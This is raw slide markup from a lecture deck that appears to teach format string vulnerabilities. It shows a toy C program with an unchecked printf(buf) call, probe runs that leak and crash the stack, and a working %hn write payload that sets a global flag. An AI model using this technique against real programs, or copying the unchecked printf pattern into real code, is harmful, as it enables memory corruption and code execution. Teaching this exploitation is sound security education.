              <a:solidFill>
                <a:srgbClr val="FF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11 	printf("\n");</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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12</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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13 	if (flag == 0x13371337) {		// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>How to win</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FF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14     	printf("You Win!\n");</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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15 	}</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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16</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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17 	return 0;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> 18 }</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>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2077"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2078" name="Shape 2078"/>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Format String Example</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2079" name="Shape 2079"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="788133" y="1838933"/>
            <a:ext cx="10729600" cy="4673200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>$ ./fmt %x:%x:%x:%x:%x:%x</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ffffda9c:3ff:1b1ea4:253a7825:78253a78:3a78253a</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="2400" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>$ ./fmt %s:%s:%s:%s:%s:%s</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Segmentation fault (core dumped)</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>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2083"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2084" name="Shape 2084"/>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Format String Example</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2085" name="Shape 2085"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1267233" y="2265100"/>
            <a:ext cx="2598400" cy="713600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E5B9B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%4911x%7$hn%65536x%8$hn</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2086" name="Shape 2086"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1267233" y="2978700"/>
            <a:ext cx="2598400" cy="574800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E5B9B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0x804a036</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2087" name="Shape 2087"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1267233" y="3553500"/>
            <a:ext cx="2598400" cy="510800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E5B9B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0x804a034</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2088" name="Shape 2088"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1267233" y="4066833"/>
            <a:ext cx="2598400" cy="510800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CEDFB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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2089" name="Shape 2089"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1267233" y="4577633"/>
            <a:ext cx="2598400" cy="510800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CEDFB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Fmt str pointer</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2090" name="Shape 2090"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="521800" y="1650600"/>
            <a:ext cx="1299200" cy="5108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High Addr</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2091" name="Shape 2091"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="521800" y="5175233"/>
            <a:ext cx="1299200" cy="5108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Low Addr</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2092" name="Shape 2092"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4451300" y="1838933"/>
            <a:ext cx="7066400" cy="4673200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>  1 #include &lt;stdio.h&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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2 #include &lt;string.h&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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3</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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4 int flag = 0;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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5</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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6 int main(int argc, char **argv) {</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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7 	char buf[1024];</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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8 	if (argc &lt; 2) return 1;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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9 	strncpy(buf, argv[1], min(sizeof(buf) - 1, 1024));</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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10 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>printf(buf);</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FF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11 	printf("\n");</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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12</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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13 	if (flag == 0x13371337) {		// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>How to win</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FF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14     	printf("You Win!\n");</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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15 	}</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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16</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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17 	return 0;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> 18 }</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>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2096"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097" name="Shape 2097"/>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Format String Example</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2098" name="Shape 2098"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="788133" y="1838933"/>
            <a:ext cx="10729600" cy="4673200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>./fmt $(python2 -c 'print "\x34\xa0\x04\x08\x36\xa0\x04\x08%4911x%7$hn%65536x%8$hn"')</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>You Win!</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2099" name="Shape 2099"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3823000" y="3439633"/>
            <a:ext cx="3588800" cy="11076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 sz="2667" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>How to execute </a:t>
            </a:r>
            <a:endParaRPr sz="2667" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2667" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>arbitrary code?</a:t>
            </a:r>
            <a:endParaRPr sz="2667" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>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2103"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
